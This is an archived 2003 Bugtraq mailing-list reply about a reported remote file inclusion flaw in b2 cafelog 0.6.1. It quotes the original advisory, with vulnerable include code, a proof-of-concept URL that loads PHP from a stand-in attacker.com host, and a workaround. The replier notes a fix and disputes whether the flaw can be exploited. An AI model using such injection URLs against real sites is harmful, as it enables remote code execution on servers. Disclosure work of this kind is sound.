Re: b2 cafelog 0.6.1 remote command execution.

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: b2 cafelog 0.6.1 remote command execution.
From: mike little <mike@xxxxxxxx>
Date: Fri, 30 May 2003 07:35:04 +0100
Delivered-to: zerbey@localhost.horry.org
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
Delivery-date: Sun, 01 Jun 2003 20:12:53 +0100
Envelope-to: zerbey@wibble.co.uk
In-reply-to: <3ED5B53E.8050903@scan-associates.net>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm
References: <3ED5B53E.8050903@scan-associates.net>
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3) Gecko/20030312

<x-flowed>
pokleyzz wrote:

Products: b2 cafelog 0.6.1 (http://cafelog.com/)
Date: 29 May 2003
Author: pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net
               shaharil_at_scan-associates.net
               munir_at_scan-associates.net
URL: http://www.scan-associates.net

Summary:  b2 cafelog 0.6.1 remote command execution.

Description
===========
b2 cafelog is blogger system written in php with mysql ad database backend.

Details
=======
b2 cafelog 0.6.1 come with directory b2-tools. This directory contain 2php scripts(blogger-2-b2.php and gm-2-b2.php) which allow user to specify $b2incand do
remote code injection.
from blogger-2-b2.php line 21-----------------------------------------------------
case "step1":

   include("b2config.php");
   include("$b2inc/b2functions.php");
   include("$b2inc/b2vars.php");
------------------------------------------------------------------------------------
from gm-2-b2.php line 5----------------------------------------------------------
// 3. load in the browser from there

include("b2config.php");
include($b2inc."/b2functions.php");
-----------------------------------------------------------------------------------
Proof of concept
===========
http://blabla.com/b2-tools/gm-2-b2.php?b2inc=http://attacker.com
attacker.com have file named b2functions.php with php script you want to
execute.

Workaround
=========
Remove b2-tools directory.

Vendor Response
===============
Vendor has been contacted on 19/05/2003 but to reply given.

Firstly, the issue has been addressedhttp://tidakada.com/board/viewtopic.php?t=3212

and a new version issued
http://tidakada.com/board/viewtopic.php?t=3234

Secondly, has anyone tried this? The fact is that b2config.php defines$b2inc with no test before hand. So that, whilst for the duration of theparsing of b2config.php, $b2inc could indeed be set to some value fromthe outside world. It is immediately overwritten with no check with thevalue set by the user (or left from the defalut installation).In order to effectively use the setting of b2inc for malicious purposesyou would have to have enough access to edit b2config.php.



Mike



</x-flowed>

Follow-Ups:
- Re: b2 cafelog 0.6.1 remote command execution.
  - From: Cheng-Jih Chen

Prev by Date: [RHSA-2003:181-01] Updated ghostscript packages fix vulnerability
Next by Date: Re: gcc (<3.2.3) implicit struct copy exploit
Previous by thread: [RHSA-2003:181-01] Updated ghostscript packages fix vulnerability
Next by thread: Re: b2 cafelog 0.6.1 remote command execution.
Index(es):
- Date
- Thread